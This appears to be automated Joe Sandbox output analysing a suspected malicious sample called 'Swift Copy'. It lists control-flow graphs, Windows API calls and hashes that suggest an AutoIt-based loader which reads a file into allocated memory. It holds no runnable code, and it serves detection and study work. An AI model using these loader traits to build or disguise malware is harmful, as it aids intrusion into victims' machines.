                                              control_flow_graph 302 db065b-db068b call db042f 305 db068d-db0698 call d9f2c6 302->305 306 db06a6-db06b2 call da5221 302->306 311 db069a-db06a1 call d9f2d9 305->311 312 db06cb-db0714 call db039a 306->312 313 db06b4-db06c9 call d9f2c6 call d9f2d9 306->313 322 db097d-db0983 311->322 320 db0781-db078a GetFileType 312->320 321 db0716-db071f 312->321 313->311 326 db078c-db07bd GetLastError call d9f2a3 CloseHandle 320->326 327 db07d3-db07d6 320->327 324 db0721-db0725 321->324 325 db0756-db077c GetLastError call d9f2a3 321->325 324->325 331 db0727-db0754 call db039a 324->331 325->311 326->311 341 db07c3-db07ce call d9f2d9 326->341 329 db07d8-db07dd 327->329 330 db07df-db07e5 327->330 334 db07e9-db0837 call da516a 329->334 330->334 335 db07e7 330->335 331->320 331->325 344 db0839-db0845 call db05ab 334->344 345 db0847-db086b call db014d 334->345 335->334 341->311 344->345 351 db086f-db0879 call da86ae 344->351 352 db087e-db08c1 345->352 353 db086d 345->353 351->322 354 db08c3-db08c7 352->354 355 db08e2-db08f0 352->355 353->351 354->355 357 db08c9-db08dd 354->357 358 db097b 355->358 359 db08f6-db08fa 355->359 357->355 358->322 359->358 361 db08fc-db092f CloseHandle call db039a 359->361 364 db0963-db0977 361->364 365 db0931-db095d GetLastError call d9f2a3 call da5333 361->365 364->358 365->364
                                              APIs
                                                • Part of subcall function 00DB039A: CreateFileW.KERNELBASE(00000000,00000000,?,00DB0704,?,?,00000000,?,00DB0704,00000000,0000000C), ref: 00DB03B7
                                              • GetLastError.KERNEL32 ref: 00DB076F
                                              • __dosmaperr.LIBCMT ref: 00DB0776
                                              • GetFileType.KERNELBASE(00000000), ref: 00DB0782
                                              • GetLastError.KERNEL32 ref: 00DB078C
                                              • __dosmaperr.LIBCMT ref: 00DB0795
                                              • CloseHandle.KERNEL32(00000000), ref: 00DB07B5
                                              • CloseHandle.KERNEL32(?), ref: 00DB08FF
                                              • GetLastError.KERNEL32 ref: 00DB0931
                                              • __dosmaperr.LIBCMT ref: 00DB0938
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 61d585441dcde905404c67bfebf5fe57f54e3b50cd3e5b8542699c9d164d1b4a
                                              • Instruction ID: 09cd2feb246b7f5cd14186369b64031f846a1317cfb82994ec65e28e2140b79a
                                              • Opcode Fuzzy Hash: 61d585441dcde905404c67bfebf5fe57f54e3b50cd3e5b8542699c9d164d1b4a
                                              • Instruction Fuzzy Hash: 19A1F636A141048FDF19AF68D851BEE7FA0EB06320F180169F816EB391DB359917CBB1

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00D73A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D72E7F,?,?,?,00000000), ref: 00D73A78
                                                • Part of subcall function 00D73357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D73379
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D7356A
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DB318D
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DB31CE
                                              • RegCloseKey.ADVAPI32(?), ref: 00DB3210
                                              • _wcslen.LIBCMT ref: 00DB3277
                                              • _wcslen.LIBCMT ref: 00DB3286
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 98802146-2727554177
                                              • Opcode ID: ff209350daededc745954cb27af1b7ec2cb41a72eb0309ad72a0ac64c15dd211
                                              • Instruction ID: 1705538104b4676fd21778cb692a001d0ad80a5ba2fd8bd6027f62860cbf71c4
                                              • Opcode Fuzzy Hash: ff209350daededc745954cb27af1b7ec2cb41a72eb0309ad72a0ac64c15dd211
                                              • Instruction Fuzzy Hash: 8071A6714043019EC314EF66DC8299BBBF8FF95740F90452EF649A31A1EB319A49CB72

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00D72B8E
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00D72B9D
                                              • LoadIconW.USER32(00000063), ref: 00D72BB3
                                              • LoadIconW.USER32(000000A4), ref: 00D72BC5
                                              • LoadIconW.USER32(000000A2), ref: 00D72BD7
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D72BEF
                                              • RegisterClassExW.USER32(?), ref: 00D72C40
                                                • Part of subcall function 00D72CD4: GetSysColorBrush.USER32(0000000F), ref: 00D72D07
                                                • Part of subcall function 00D72CD4: RegisterClassExW.USER32(00000030), ref: 00D72D31
                                                • Part of subcall function 00D72CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D72D42
                                                • Part of subcall function 00D72CD4: InitCommonControlsEx.COMCTL32(?), ref: 00D72D5F
                                                • Part of subcall function 00D72CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D72D6F
                                                • Part of subcall function 00D72CD4: LoadIconW.USER32(000000A9), ref: 00D72D85
                                                • Part of subcall function 00D72CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D72D94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: d7e8a06c67ade80346e7b79011941f26b767544965d78164773e22b7e0ac441d
                                              • Instruction ID: 518c6625a526e1a8d88633778676087ca685eb8da1ab518b404a87e6cd83b614
                                              • Opcode Fuzzy Hash: d7e8a06c67ade80346e7b79011941f26b767544965d78164773e22b7e0ac441d
                                              • Instruction Fuzzy Hash: 99216A78E40314AFCF109FA7EC45BA97FB4FB49B40F16009AE500B66A0D3B1058ACF90
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D7BB4E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: p#$p#$p#$p#$p%$p%$x#$x#
                                              • API String ID: 1385522511-4136154834
                                              • Opcode ID: 8b12bbc4fdad92c36e542fa10e66fde7689073dbe0a8f29560f64ba93d223ec5
                                              • Instruction ID: ebb42395e45282d32f4a2bab32f18dc5cc64d0d091a491f5dcc29d22844cd18b
                                              • Opcode Fuzzy Hash: 8b12bbc4fdad92c36e542fa10e66fde7689073dbe0a8f29560f64ba93d223ec5
                                              • Instruction Fuzzy Hash: D8328B34A0020ADFDB14CF54C894BBEBBB5EF44324F58805AEA59AB251E774ED41CBB1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 650 d73170-d73185 651 d73187-d7318a 650->651 652 d731e5-d731e7 650->652 653 d7318c-d73193 651->653 654 d731eb 651->654 652->651 655 d731e9 652->655 656 d73265-d7326d PostQuitMessage 653->656 657 d73199-d7319e 653->657 659 db2dfb-db2e23 call d718e2 call d8e499 654->659 660 d731f1-d731f6 654->660 658 d731d0-d731d8 DefWindowProcW 655->658 665 d73219-d7321b 656->665 662 d731a4-d731a8 657->662 663 db2e7c-db2e90 call ddbf30 657->663 664 d731de-d731e4 658->664 694 db2e28-db2e2f 659->694 666 d7321d-d73244 SetTimer RegisterWindowMessageW 660->666 667 d731f8-d731fb 660->667 669 db2e68-db2e77 call ddc161 662->669 670 d731ae-d731b3 662->670 663->665 688 db2e96 663->688 665->664 666->665 671 d73246-d73251 CreatePopupMenu 666->671 673 d73201-d73214 KillTimer call d730f2 call d73c50 667->673 674 db2d9c-db2d9f 667->674 669->665 677 db2e4d-db2e54 670->677 678 d731b9-d731be 670->678 671->665 673->665 680 db2da1-db2da5 674->680 681 db2dd7-db2df6 MoveWindow 674->681 677->658 691 db2e5a-db2e63 call dd0ad7 677->691 686 d731c4-d731ca 678->686 687 d73253-d73263 call d7326f 678->687 689 db2da7-db2daa 680->689 690 db2dc6-db2dd2 SetFocus 680->690 681->665 686->658 686->694 687->665 688->658 689->686 695 db2db0-db2dc1 call d718e2 689->695 690->665 691->658 694->658 699 db2e35-db2e48 call d730f2 call d73837 694->699 695->665 699->658
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D7316A,?,?), ref: 00D731D8
                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00D7316A,?,?), ref: 00D73204
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D73227
                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D7316A,?,?), ref: 00D73232
                                              • CreatePopupMenu.USER32 ref: 00D73246
                                              • PostQuitMessage.USER32(00000000), ref: 00D73267
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: c2c6df396475c168f3a5a406793b10744fa1b381526dac68da69230e5084edec
                                              • Instruction ID: a683934180d78ff8abba69399eaec1c2c0a6d767b2a347f7c739266203be3a1b
                                              • Opcode Fuzzy Hash: c2c6df396475c168f3a5a406793b10744fa1b381526dac68da69230e5084edec
                                              • Instruction Fuzzy Hash: D7419B35250300EFDF141F789C0ABB93B15E746340F1C821AF94EA12A2F771CA85A7B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                              • API String ID: 0-2799515523
                                              • Opcode ID: 0d995282a3ac9aa1a198a0abe5b4fee998a6ccc1b813aa4a4186081bf38f4800
                                              • Instruction ID: d1657301476d3c31c7fc87d62cee6e8165490ed67e1839b715f3c94961c543b3
                                              • Opcode Fuzzy Hash: 0d995282a3ac9aa1a198a0abe5b4fee998a6ccc1b813aa4a4186081bf38f4800
                                              • Instruction Fuzzy Hash: 2FC26A75A00215CFCB24DF58C881AADB7B1FF09304F2885A9E959AB391E375ED41CBB1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1216 ed2600-ed26ae call ed0000 1219 ed26b5-ed26db call ed3510 CreateFileW 1216->1219 1222 ed26dd 1219->1222 1223 ed26e2-ed26f2 1219->1223 1224 ed282d-ed2831 1222->1224 1230 ed26f9-ed2713 VirtualAlloc 1223->1230 1231 ed26f4 1223->1231 1225 ed2873-ed2876 1224->1225 1226 ed2833-ed2837 1224->1226 1232 ed2879-ed2880 1225->1232 1228 ed2839-ed283c 1226->1228 1229 ed2843-ed2847 1226->1229 1228->1229 1235 ed2849-ed2853 1229->1235 1236 ed2857-ed285b 1229->1236 1237 ed271a-ed2731 ReadFile 1230->1237 1238 ed2715 1230->1238 1231->1224 1233 ed28d5-ed28ea 1232->1233 1234 ed2882-ed288d 1232->1234 1241 ed28ec-ed28f7 VirtualFree 1233->1241 1242 ed28fa-ed2902 1233->1242 1239 ed288f 1234->1239 1240 ed2891-ed289d 1234->1240 1235->1236 1243 ed285d-ed2867 1236->1243 1244 ed286b 1236->1244 1245 ed2738-ed2778 VirtualAlloc 1237->1245 1246 ed2733 1237->1246 1238->1224 1239->1233 1249 ed289f-ed28af 1240->1249 1250 ed28b1-ed28bd 1240->1250 1241->1242 1243->1244 1244->1225 1247 ed277f-ed279a call ed3760 1245->1247 1248 ed277a 1245->1248 1246->1224 1256 ed27a5-ed27af 1247->1256 1248->1224 1252 ed28d3 1249->1252 1253 ed28bf-ed28c8 1250->1253 1254 ed28ca-ed28d0 1250->1254 1252->1232 1253->1252 1254->1252 1257 ed27b1-ed27e0 call ed3760 1256->1257 1258 ed27e2-ed27f6 call ed3570 1256->1258 1257->1256 1264 ed27f8 1258->1264 1265 ed27fa-ed27fe 1258->1265 1264->1224 1266 ed280a-ed280e 1265->1266 1267 ed2800-ed2804 FindCloseChangeNotification 1265->1267 1268 ed281e-ed2827 1266->1268 1269 ed2810-ed281b VirtualFree 1266->1269 1267->1266 1268->1219 1268->1224 1269->1268
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00ED26D1
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00ED28F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateFileFreeVirtual
                                              • String ID: .
                                              • API String ID: 204039940-1603360339
                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                              • Instruction ID: 3d391b64b62ee992cf9212820146f03378b89313e8869a91a0bcca4cc0307f88
                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                              • Instruction Fuzzy Hash: A6A10874E00209EBDB14CFA4C994BEEBBB5FF58304F20915AE611BB380D7759A81DB94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1270 da8d45-da8d55 1271 da8d6f-da8d71 1270->1271 1272 da8d57-da8d6a call d9f2c6 call d9f2d9 1270->1272 1274 da90d9-da90e6 call d9f2c6 call d9f2d9 1271->1274 1275 da8d77-da8d7d 1271->1275 1289 da90f1 1272->1289 1294 da90ec call da27ec 1274->1294 1275->1274 1278 da8d83-da8dae 1275->1278 1278->1274 1279 da8db4-da8dbd 1278->1279 1282 da8dbf-da8dd2 call d9f2c6 call d9f2d9 1279->1282 1283 da8dd7-da8dd9 1279->1283 1282->1294 1287 da8ddf-da8de3 1283->1287 1288 da90d5-da90d7 1283->1288 1287->1288 1293 da8de9-da8ded 1287->1293 1291 da90f4-da90f9 1288->1291 1289->1291 1293->1282 1297 da8def-da8e06 1293->1297 1294->1289 1299 da8e08-da8e0b 1297->1299 1300 da8e23-da8e2c 1297->1300 1301 da8e0d-da8e13 1299->1301 1302 da8e15-da8e1e 1299->1302 1303 da8e4a-da8e54 1300->1303 1304 da8e2e-da8e45 call d9f2c6 call d9f2d9 call da27ec 1300->1304 1301->1302 1301->1304 1307 da8ebf-da8ed9 1302->1307 1305 da8e5b-da8e79 call da3820 call da29c8 * 2 1303->1305 1306 da8e56-da8e58 1303->1306 1333 da900c 1304->1333 1343 da8e7b-da8e91 call d9f2d9 call d9f2c6 1305->1343 1344 da8e96-da8ebc call da9424 1305->1344 1306->1305 1310 da8edf-da8eef 1307->1310 1311 da8fad-da8fb6 call daf89b 1307->1311 1310->1311 1315 da8ef5-da8ef7 1310->1315 1322 da8fb8-da8fca 1311->1322 1323 da9029 1311->1323 1315->1311 1319 da8efd-da8f23 1315->1319 1319->1311 1324 da8f29-da8f3c 1319->1324 1322->1323 1328 da8fcc-da8fdb GetConsoleMode 1322->1328 1326 da902d-da9045 ReadFile 1323->1326 1324->1311 1329 da8f3e-da8f40 1324->1329 1331 da90a1-da90ac GetLastError 1326->1331 1332 da9047-da904d 1326->1332 1328->1323 1334 da8fdd-da8fe1 1328->1334 1329->1311 1335 da8f42-da8f6d 1329->1335 1337 da90ae-da90c0 call d9f2d9 call d9f2c6 1331->1337 1338 da90c5-da90c8 1331->1338 1332->1331 1339 da904f 1332->1339 1341 da900f-da9019 call da29c8 1333->1341 1334->1326 1340 da8fe3-da8ffd ReadConsoleW 1334->1340 1335->1311 1342 da8f6f-da8f82 1335->1342 1337->1333 1350 da90ce-da90d0 1338->1350 1351 da9005-da900b call d9f2a3 1338->1351 1346 da9052-da9064 1339->1346 1348 da901e-da9027 1340->1348 1349 da8fff GetLastError 1340->1349 1341->1291 1342->1311 1353 da8f84-da8f86 1342->1353 1343->1333 1344->1307 1346->1341 1357 da9066-da906a 1346->1357 1348->1346 1349->1351 1350->1341 1351->1333 1353->1311 1361 da8f88-da8fa8 1353->1361 1364 da906c-da907c call da8a61 1357->1364 1365 da9083-da908e 1357->1365 1361->1311 1376 da907f-da9081 1364->1376 1370 da909a-da909f call da88a1 1365->1370 1371 da9090 call da8bb1 1365->1371 1377 da9095-da9098 1370->1377 1371->1377 1376->1341 1377->1376
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74fc6ddbf8d3d99d4f9c9c5bca4c41c4e41fc345de36f03a747899d5fce38848
                                              • Instruction ID: 4155228e6fca55b796afc2ca21663f9dd609e1174b1007ed670170bafc905512
                                              • Opcode Fuzzy Hash: 74fc6ddbf8d3d99d4f9c9c5bca4c41c4e41fc345de36f03a747899d5fce38848
                                              • Instruction Fuzzy Hash: 7CC1F074A04249AFCF11EFA9C851BADBBB0AF0B310F1841A9F954E7392C7318942CB75

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1388 d72c63-d72cd3 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72C91
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72CB2
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D71CAD,?), ref: 00D72CC6
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D71CAD,?), ref: 00D72CCF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 4d482c1aa9e933b9ad3a558084f27662fd9b188592531b0fcd4ad00ed0a08e73
                                              • Instruction ID: e92ef892e28111665a0be85f6e7bdf5c8a88ddeeb176bfe67a534e6466854c85
                                              • Opcode Fuzzy Hash: 4d482c1aa9e933b9ad3a558084f27662fd9b188592531b0fcd4ad00ed0a08e73
                                              • Instruction Fuzzy Hash: 80F0DA799402907EEB311B27AC49E7B2EBDD7C7F50B16109AF900B25A0C671189ADAB0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1503 ed23b0-ed24f4 call ed0000 call ed22a0 CreateFileW 1510 ed24fb-ed250b 1503->1510 1511 ed24f6 1503->1511 1514 ed250d 1510->1514 1515 ed2512-ed252c VirtualAlloc 1510->1515 1512 ed25ab-ed25b0 1511->1512 1514->1512 1516 ed252e 1515->1516 1517 ed2530-ed2547 ReadFile 1515->1517 1516->1512 1518 ed2549 1517->1518 1519 ed254b-ed2585 call ed22e0 call ed12a0 1517->1519 1518->1512 1524 ed2587-ed259c call ed2330 1519->1524 1525 ed25a1-ed25a9 ExitProcess 1519->1525 1524->1525 1525->1512
                                              APIs
                                                • Part of subcall function 00ED22A0: Sleep.KERNELBASE(000001F4), ref: 00ED22B1
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00ED24EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: GTTBZOISQRWV2YMUFZYH6V91ANL5S
                                              • API String ID: 2694422964-2132517090
                                              • Opcode ID: 5a2468a194412bd6f6085ce5b00c0593abf23bf04294584b446443b225c71f58
                                              • Instruction ID: 14d76951130a4e3d005fc179898aafb6335c0165a1e0f14390f3f5e5e528d8e5
                                              • Opcode Fuzzy Hash: 5a2468a194412bd6f6085ce5b00c0593abf23bf04294584b446443b225c71f58
                                              • Instruction Fuzzy Hash: D661A170D04288DAEF11D7F4D859BDEBBB4AF25304F044199E6487B2C1C7B91B49CBA6

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
